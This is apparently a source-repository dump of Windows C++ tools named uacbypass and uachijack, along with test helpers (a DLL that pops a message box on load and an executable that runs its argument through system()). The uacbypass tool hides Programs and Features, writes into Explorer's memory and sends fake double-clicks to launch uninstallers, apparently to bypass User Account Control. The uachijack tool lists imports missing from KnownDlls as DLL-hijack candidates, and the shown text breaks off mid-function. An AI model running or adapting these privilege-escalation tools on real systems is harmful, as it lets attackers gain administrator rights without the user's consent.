| 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /sendfile/sendfile.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /testdll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | extern "C" __declspec(dllexport) void test() 7 | { 8 | MessageBox(NULL, _T("test"), NULL, 0); 9 | } 10 | 11 | 12 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 13 | { 14 | 15 | switch (ul_reason_for_call) 16 | { 17 | case DLL_PROCESS_ATTACH: 18 | MessageBox(NULL, _T("DllMain"), NULL, 0); 19 | break; 20 | case DLL_THREAD_ATTACH: 21 | case DLL_THREAD_DETACH: 22 | case DLL_PROCESS_DETACH: 23 | break; 24 | } 25 | 26 | return TRUE; 27 | } -------------------------------------------------------------------------------- /testdll/testdll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8} 23 | Win32Proj 24 | testdll 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /testdll/testdll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /testexe/testexe.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int main(int argc, char* argv[]) 6 | { 7 | if (argc == 2) 8 | system(argv[1]); 9 | 10 | return 0; 11 | } -------------------------------------------------------------------------------- /testexe/testexe.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {5410031F-4456-4538-8B90-D2D21C75CE97} 23 | Win32Proj 24 | testexe 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | MultiThreaded 120 | 121 | 122 | Console 123 | true 124 | true 125 | false 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | MultiThreaded 138 | 139 | 140 | Console 141 | true 142 | true 143 | false 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | -------------------------------------------------------------------------------- /testexe/testexe.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /uacbypass/appinfo.cpp: -------------------------------------------------------------------------------- 1 | #include "appinfo.h" 2 | 3 | 4 | int _GetAppInfoA_(HKEY hKey, LPSTR lpszAppName, LPCSTR lpszKeyValueName, string& strKeyValue) 5 | { 6 | int ret; 7 | HKEY hInstallAppKey; 8 | ret = RegOpenKeyExA(hKey, lpszAppName, 0, KEY_READ, &hInstallAppKey); 9 | if (ret != ERROR_SUCCESS) 10 | return -1; 11 | 12 | DWORD dwKeyValueType = REG_SZ; 13 | DWORD dwKeyValueDataSize = 0; 14 | ret = RegQueryValueExA(hInstallAppKey, lpszKeyValueName, NULL, &dwKeyValueType, NULL, &dwKeyValueDataSize); 15 | if (ret == ERROR_FILE_NOT_FOUND) 16 | { 17 | RegCloseKey(hInstallAppKey); 18 | return 0; 19 | } 20 | else if (ret != ERROR_SUCCESS) 21 | { 22 | RegCloseKey(hInstallAppKey); 23 | return -1; 24 | } 25 | 26 | if (dwKeyValueType != REG_SZ && dwKeyValueType != REG_EXPAND_SZ) 27 | { 28 | RegCloseKey(hInstallAppKey); 29 | return 0; 30 | } 31 | LPSTR lpszKeyValueData = new char[dwKeyValueDataSize + 1]; 32 | memset(lpszKeyValueData, 0, dwKeyValueDataSize + 1); 33 | ret = RegQueryValueExA(hInstallAppKey, lpszKeyValueName, NULL, &dwKeyValueType, (LPBYTE)lpszKeyValueData, &dwKeyValueDataSize); 34 | if (ret != ERROR_SUCCESS) 35 | { 36 | delete[] lpszKeyValueData; 37 | RegCloseKey(hInstallAppKey); 38 | return -1; 39 | } 40 | strKeyValue = lpszKeyValueData; 41 | delete[] lpszKeyValueData; 42 | RegCloseKey(hInstallAppKey); 43 | return 0; 44 | } 45 | 46 | int GetAllInstalledAppInfoA(LPCSTR lpszSubKey, vector& vAppInfo) 47 | { 48 | int ret = 0; 49 | HKEY hKey = NULL; 50 | ret = RegOpenKeyExA(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_READ, &hKey); 51 | if (ret != ERROR_SUCCESS) 52 | return -1; 53 | 54 | DWORD dwSubKeysCnt; 55 | DWORD dwMaxSubKeyNameLen; 56 | DWORD dwKeyValueCnt; 57 | DWORD dwMaxKeyValueNameLen; 58 | DWORD dwMaxKeyValueDataLen; 59 | 60 | ret = RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwSubKeysCnt, &dwMaxSubKeyNameLen, NULL, &dwKeyValueCnt, &dwMaxKeyValueNameLen, &dwMaxKeyValueDataLen, NULL, NULL); 61 | if (ret != ERROR_SUCCESS) 62 | { 63 | RegCloseKey(hKey); 64 | return -1; 65 | } 66 | 67 | DWORD dwIndex; 68 | LPSTR lpszSubKeyName = new char[dwMaxSubKeyNameLen + 1]; 69 | DWORD dwNameLen = dwMaxSubKeyNameLen + 1; 70 | 71 | for (dwIndex = 0; dwIndex < dwSubKeysCnt; ++dwIndex) 72 | { 73 | dwNameLen = dwMaxSubKeyNameLen + 1; 74 | memset(lpszSubKeyName, 0, dwMaxSubKeyNameLen + 1); 75 | 76 | ret = RegEnumKeyExA(hKey, dwIndex, lpszSubKeyName, &dwNameLen, NULL, NULL, NULL, NULL); 77 | if (ret != ERROR_SUCCESS) 78 | { 79 | RegCloseKey(hKey); 80 | delete[] lpszSubKeyName; 81 | return -1; 82 | } 83 | 84 | ApplicationInfoA appInfo; 85 | appInfo.strName = lpszSubKeyName; 86 | _GetAppInfoA_(hKey, lpszSubKeyName, "DisplayName", appInfo.strDisplayName); 87 | _GetAppInfoA_(hKey, lpszSubKeyName, "Publisher", appInfo.strPublisher); 88 | _GetAppInfoA_(hKey, lpszSubKeyName, "Version", appInfo.strVersion); 89 | _GetAppInfoA_(hKey, lpszSubKeyName, "DisplayVersion", appInfo.strDisplayVersion); 90 | _GetAppInfoA_(hKey, lpszSubKeyName, "InstallLocation", appInfo.strInstallLocation); 91 | _GetAppInfoA_(hKey, lpszSubKeyName, "UninstallString", appInfo.strUninstallString); 92 | vAppInfo.push_back(appInfo); 93 | } 94 | 95 | delete[] lpszSubKeyName; 96 | RegCloseKey(hKey); 97 | return 0; 98 | } -------------------------------------------------------------------------------- /uacbypass/appinfo.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | struct ApplicationInfoA 8 | { 9 | string strName; 10 | string strDisplayName; 11 | string strPublisher; 12 | string strVersion; 13 | string strDisplayVersion; 14 | string strInstallLocation; 15 | string strUninstallString; 16 | }; 17 | 18 | int _GetAppInfoA_(HKEY hKey, LPSTR lpszAppName, LPCSTR lpszKeyValueName, string& strKeyValue); 19 | int GetAllInstalledAppInfoA(LPCSTR lpszSubKey, vector& vAppInfo); 20 | -------------------------------------------------------------------------------- /uacbypass/uacbypass.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "appinfo.h" 7 | #pragma comment(lib, "Shlwapi.lib") 8 | 9 | #define MAX_BUF 260 10 | 11 | typedef struct 12 | { 13 | BOOL Vulnerable; 14 | WCHAR DisplayName[MAX_BUF]; 15 | WCHAR UninstallString[MAX_PATH]; 16 | }UninstallItem, *pUninstallItem; 17 | 18 | LPSTR Unicode2Ansi(LPCWSTR lpWideCharStr) 19 | { 20 | int nAnsiLen = 0; 21 | LPSTR pAnsi = NULL; 22 | nAnsiLen = WideCharToMultiByte(CP_ACP, 0, lpWideCharStr, -1, NULL, 0, NULL, NULL); 23 | pAnsi = (LPSTR)malloc(nAnsiLen + 1); 24 | memset(pAnsi, 0, nAnsiLen + 1); 25 | WideCharToMultiByte(CP_ACP, 0, lpWideCharStr, -1, pAnsi, nAnsiLen, NULL, NULL); 26 | return pAnsi; 27 | } 28 | 29 | HWND FindNestedWindowFromClassName(HWND OutmostWindow, PWCHAR *ClassNames, DWORD ClassCount) 30 | { 31 | HWND ParentHwnd = OutmostWindow; 32 | HWND ChildHwnd = NULL; 33 | for (DWORD i = 0; i < ClassCount; i++) 34 | { 35 | do 36 | { 37 | ChildHwnd = FindWindowEx(ParentHwnd, NULL, ClassNames[i], NULL); 38 | } while (!ChildHwnd); 39 | ParentHwnd = ChildHwnd; 40 | } 41 | return ChildHwnd; 42 | } 43 | 44 | VOID GetListedNames(HANDLE hProcess, HWND SysListView32Hwnd, pUninstallItem pItems, DWORD ItemCount) 45 | { 46 | WCHAR TextBuf[MAX_BUF] = { 0 }; 47 | PWCHAR pText = (PWCHAR)VirtualAllocEx(hProcess, NULL, MAX_BUF, MEM_COMMIT, PAGE_READWRITE); 48 | LPLVITEMW plvitem = (LPLVITEMW)VirtualAllocEx(hProcess, NULL, sizeof(LVITEM), MEM_COMMIT, PAGE_READWRITE); 49 | LVITEMW lvitem; 50 | lvitem.cchTextMax = MAX_BUF; 51 | lvitem.iSubItem = 0; 52 | lvitem.pszText = pText; 53 | WriteProcessMemory(hProcess, plvitem, &lvitem, sizeof(LVITEMW), NULL); 54 | for (DWORD i = 0; i < ItemCount; i++) 55 | { 56 | SendMessage(SysListView32Hwnd, LVM_GETITEMTEXT, i, (LPARAM)plvitem); 57 | ReadProcessMemory(hProcess, pText, TextBuf, MAX_BUF, NULL); 58 | pItems[i].Vulnerable = FALSE; 59 | lstrcpyn(pItems[i].DisplayName, TextBuf, MAX_BUF); 60 | } 61 | } 62 | 63 | BOOL DBClickItem(HANDLE hProcess, HWND SysListView32Hwnd, DWORD ItemIndex) 64 | { 65 | if (!SysListView32Hwnd || !hProcess) 66 | return FALSE; 67 | PRECT pRect = (PRECT)VirtualAllocEx(hProcess, NULL, sizeof(RECT), MEM_COMMIT, PAGE_READWRITE); 68 | if (!pRect) 69 | return FALSE; 70 | RECT Rect; 71 | Rect.left = LVIR_BOUNDS; 72 | if (!WriteProcessMemory(hProcess, pRect, &Rect, sizeof(RECT), NULL)) 73 | return FALSE; 74 | SendMessage(SysListView32Hwnd, LVM_GETITEMRECT, ItemIndex, (LPARAM)pRect); 75 | if (!ReadProcessMemory(hProcess, pRect, &Rect, sizeof(RECT), NULL)) 76 | return FALSE; 77 | DWORD Pos = ((Rect.top + Rect.bottom) / 2 << 16) + (Rect.left + 30); 78 | PostMessage(SysListView32Hwnd, WM_LBUTTONDOWN, MK_LBUTTON, (LPARAM)Pos); 79 | PostMessage(SysListView32Hwnd, WM_LBUTTONUP, NULL, (LPARAM)Pos); 80 | PostMessage(SysListView32Hwnd, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)Pos); 81 | PostMessage(SysListView32Hwnd, WM_LBUTTONUP, NULL, (LPARAM)Pos); 82 | return TRUE; 83 | } 84 | 85 | HANDLE WindowToProcess(HWND hWnd) 86 | { 87 | DWORD dwPID = 0; 88 | DWORD dwThreadID = GetWindowThreadProcessId(hWnd, &dwPID); 89 | return OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); 90 | } 91 | 92 | void wmain(int argc, wchar_t* argv[]) 93 | { 94 | bool bList = false; 95 | int nIndex = -1; 96 | vector vAppInfo; 97 | vector vAppInfo_wow64; 98 | WCHAR WinClassName[MAX_BUF] = { 0 }; 99 | WCHAR WinText[MAX_BUF] = { 0 }; 100 | HWND Hwnd = NULL; 101 | PWCHAR WindowClasses[] = { L"ShellTabWindowClass", L"DUIViewWndClassName", L"DirectUIHWND", L"CtrlNotifySink", L"SHELLDLL_DefView", L"SysListView32" }; 102 | 103 | if (wcsicmp(argv[1], L"-list") == 0) 104 | bList = true; 105 | else if (wcsicmp(argv[1], L"-exp") == 0) 106 | nIndex = _wtoi(argv[2]); 107 | 108 | if (!bList && nIndex == 0) 109 | return; 110 | 111 | GetAllInstalledAppInfoA("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", vAppInfo); 112 | GetAllInstalledAppInfoA("SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall", vAppInfo_wow64); 113 | 114 | WinExec("rundll32.exe shell32.dll Control_RunDLL appwiz.cpl 2", SW_HIDE); 115 | 116 | for (int i = 0; i < 5; i++) 117 | { 118 | Hwnd = GetForegroundWindow(); 119 | if (lstrcmp(WinClassName, L"CabinetWClass") != 0 || StrStrW(WinText, L"Programs and Features") == NULL) 120 | { 121 | Hwnd = GetForegroundWindow(); 122 | GetClassName(Hwnd, WinClassName, MAX_BUF); 123 | SendMessage(Hwnd, WM_GETTEXT, MAX_BUF, (LPARAM)WinText); 124 | } 125 | else 126 | break; 127 | Sleep(100); 128 | } 129 | 130 | ShowWindow(Hwnd, SW_MINIMIZE); 131 | 132 | HWND SysListView32 = FindNestedWindowFromClassName(Hwnd, WindowClasses, sizeof(WindowClasses) / sizeof(PWCHAR)); 133 | if (!SysListView32) 134 | { 135 | _tprintf(L"Not found window.\n"); 136 | goto CLEAN; 137 | } 138 | 139 | DWORD ItemCount = ListView_GetItemCount(SysListView32); 140 | if(ItemCount <= 0) 141 | { 142 | _tprintf(L"Item count %d.\n", ItemCount); 143 | goto CLEAN; 144 | } 145 | 146 | pUninstallItem pItems = (pUninstallItem)new UninstallItem[ItemCount]; 147 | memset(pItems, 0, sizeof(UninstallItem)*ItemCount); 148 | 149 | HANDLE hProcess = WindowToProcess(SysListView32); 150 | if (!hProcess) 151 | { 152 | _tprintf(L"Window to process error.\n"); 153 | goto CLEAN; 154 | } 155 | 156 | GetListedNames(hProcess, SysListView32, pItems, ItemCount); 157 | 158 | if (bList) 159 | { 160 | for (int i = 0; i < ItemCount; i++) 161 | { 162 | bool bFind = false; 163 | char* name = Unicode2Ansi(pItems[i].DisplayName); 164 | vector::iterator iter = vAppInfo.begin(); 165 | while (iter != vAppInfo.end()) 166 | { 167 | if (stricmp(name, iter->strDisplayName.c_str()) == 0) 168 | { 169 | _tprintf(L"%d:%S:%S\n", i, iter->strDisplayName.c_str(), iter->strUninstallString.c_str()); 170 | bFind = true; 171 | break; 172 | } 173 | ++iter; 174 | } 175 | if (!bFind) 176 | { 177 | iter = vAppInfo_wow64.begin(); 178 | while (iter != vAppInfo_wow64.end()) 179 | { 180 | if (stricmp(name, iter->strDisplayName.c_str()) == 0) 181 | { 182 | _tprintf(L"%d:%S:%S\n", i, iter->strDisplayName.c_str(), iter->strUninstallString.c_str()); 183 | break; 184 | } 185 | ++iter; 186 | } 187 | } 188 | } 189 | } 190 | else if (nIndex >= 0) 191 | { 192 | DBClickItem(hProcess, SysListView32, nIndex); 193 | Sleep(100); 194 | } 195 | 196 | CLEAN: 197 | SendMessage(Hwnd, WM_CLOSE, 0, 0); 198 | } -------------------------------------------------------------------------------- /uacbypass/uacbypass.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3} 23 | Win32Proj 24 | uac_bypass_uninstall 25 | 8.1 26 | uacbypass 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | -------------------------------------------------------------------------------- /uacbypass/uacbypass.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /uachijack/uachijack.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "Shlwapi.lib") 6 | 7 | 8 | #define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0) 9 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 10 | #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) 11 | 12 | #define OBJ_CASE_INSENSITIVE 0x00000040L 13 | #define OBJ_KERNEL_HANDLE 0x00000200L 14 | 15 | typedef LONG NTSTATUS; 16 | 17 | typedef struct _IO_STATUS_BLOCK 18 | { 19 | NTSTATUS Status; 20 | ULONG Information; 21 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 22 | 23 | typedef struct _UNICODE_STRING 24 | { 25 | USHORT Length; 26 | USHORT MaximumLength; 27 | PWSTR Buffer; 28 | }UNICODE_STRING, *PUNICODE_STRING; 29 | 30 | typedef struct _OBJECT_ATTRIBUTES 31 | { 32 | ULONG Length; 33 | HANDLE RootDirectory; 34 | PUNICODE_STRING ObjectName; 35 | ULONG Attributes; 36 | PVOID SecurityDescriptor; 37 | PVOID SecurityQualityOfService; 38 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 39 | 40 | typedef NTSTATUS(CALLBACK* ZWOPENSECTION)( 41 | OUT PHANDLE SectionHandle, 42 | IN ACCESS_MASK DesiredAccess, 43 | IN POBJECT_ATTRIBUTES ObjectAttributes 44 | ); 45 | 46 | typedef VOID(CALLBACK* RTLINITUNICODESTRING)( 47 | IN OUT PUNICODE_STRING DestinationString, 48 | IN PCWSTR SourceString 49 | ); 50 | 51 | RTLINITUNICODESTRING RtlInitUnicodeString; 52 | ZWOPENSECTION ZwOpenSection; 53 | 54 | 55 | PWCHAR Ansi2Uni(LPCSTR lpMultiByteStr) 56 | { 57 | int nUniLen = 0; 58 | PWCHAR pUnicode = NULL; 59 | nUniLen = MultiByteToWideChar(CP_ACP, 0, lpMultiByteStr, -1, NULL, 0); 60 | pUnicode = (PWCHAR)malloc((nUniLen + 1) * sizeof(WCHAR)); 61 | memset(pUnicode, 0, (nUniLen + 1) * sizeof(WCHAR)); 62 | MultiByteToWideChar(CP_ACP, 0, lpMultiByteStr, -1, (LPWSTR)pUnicode, nUniLen); 63 | return pUnicode; 64 | } 65 | 66 | void InitNtFunc() 67 | { 68 | HMODULE hModule = GetModuleHandle(_T("ntdll.dll")); 69 | RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(hModule, "RtlInitUnicodeString"); 70 | ZwOpenSection = (ZWOPENSECTION)GetProcAddress(hModule, "ZwOpenSection"); 71 | } 72 | 73 | BOOL CheckKnownDllsExists(LPCWSTR dllName) 74 | { 75 | HANDLE hSection = NULL; 76 | NTSTATUS status; 77 | OBJECT_ATTRIBUTES attributes; 78 | UNICODE_STRING us; 79 | WCHAR known_path[MAX_PATH] = { 0 }; 80 | 81 | wsprintfW(known_path, L"\\KnownDlls\\%s", dllName); 82 | 83 | RtlInitUnicodeString(&us, known_path); 84 | 85 | attributes.Length = sizeof(OBJECT_ATTRIBUTES); 86 | attributes.RootDirectory = NULL; 87 | attributes.ObjectName = &us; 88 | attributes.Attributes = OBJ_CASE_INSENSITIVE; 89 | attributes.SecurityDescriptor = NULL; 90 | attributes.SecurityQualityOfService = NULL; 91 | 92 | status = ZwOpenSection(&hSection, SECTION_QUERY, &attributes); 93 | 94 | if (hSection) 95 | CloseHandle(hSection); 96 | 97 | return NT_SUCCESS(status); 98 | } 99 | 100 | DWORD Rva2Offset(DWORD rva, PIMAGE_SECTION_HEADER psh, PIMAGE_NT_HEADERS pnt) 101 | { 102 | size_t i = 0; 103 | PIMAGE_SECTION_HEADER pSeh; 104 | if (rva == 0) 105 | return (rva); 106 | pSeh = psh; 107 | for (i = 0; i < pnt->FileHeader.NumberOfSections; i++) 108 | { 109 | if (rva >= pSeh->VirtualAddress && rva < pSeh->VirtualAddress + pSeh->Misc.VirtualSize) 110 | break; 111 | pSeh++; 112 | } 113 | return (rva - pSeh->VirtualAddress + pSeh->PointerToRawData); 114 | } 115 | 116 | void ParseImportTable(LPCTSTR file) 117 | { 118 | HANDLE handle = CreateFile(file, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); 119 | DWORD byteread, size = GetFileSize(handle, NULL); 120 | PVOID virtualpointer = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); 121 | ReadFile(handle, virtualpointer, size, &byteread, NULL); 122 | CloseHandle(handle); 123 | 124 | PIMAGE_NT_HEADERS ntheaders = (PIMAGE_NT_HEADERS)(PCHAR(virtualpointer) + PIMAGE_DOS_HEADER(virtualpointer)->e_lfanew); 125 | PIMAGE_SECTION_HEADER pSech = IMAGE_FIRST_SECTION(ntheaders); 126 | PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor; 127 | 128 | if (ntheaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size != 0) 129 | { 130 | pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)virtualpointer + Rva2Offset(ntheaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, pSech, ntheaders)); 131 | 132 | while (pImportDescriptor->Name != NULL) 133 | { 134 | char* name = (PCHAR)((DWORD_PTR)virtualpointer + Rva2Offset(pImportDescriptor->Name, pSech, ntheaders)); 135 | 136 | if (!CheckKnownDllsExists(Ansi2Uni(name))) 137 | printf("%s\n", name); 138 | 139 | pImportDescriptor++; 140 | } 141 | } 142 | 143 | if (virtualpointer) 144 | VirtualFree(virtualpointer, size, MEM_DECOMMIT); 145 | } 146 | 147 | BOOL CALLBACK EnumResourceNameCallback_Dir(HMODULE hModule, LPCTSTR lpType, LPTSTR lpName, LONG_PTR lParam) 148 | { 149 | HRSRC hResInfo = FindResource(hModule, lpName, lpType); 150 | DWORD cbResource = SizeofResource(hModule, hResInfo); 151 | 152 | HGLOBAL hResData = LoadResource(hModule, hResInfo); 153 | const BYTE *pResource = (const BYTE *)LockResource(hResData); 154 | 155 | char* manifest = new char[cbResource + 1]; 156 | memcpy(manifest, pResource, cbResource); 157 | manifest[cbResource] = '\0'; 158 | 159 | if 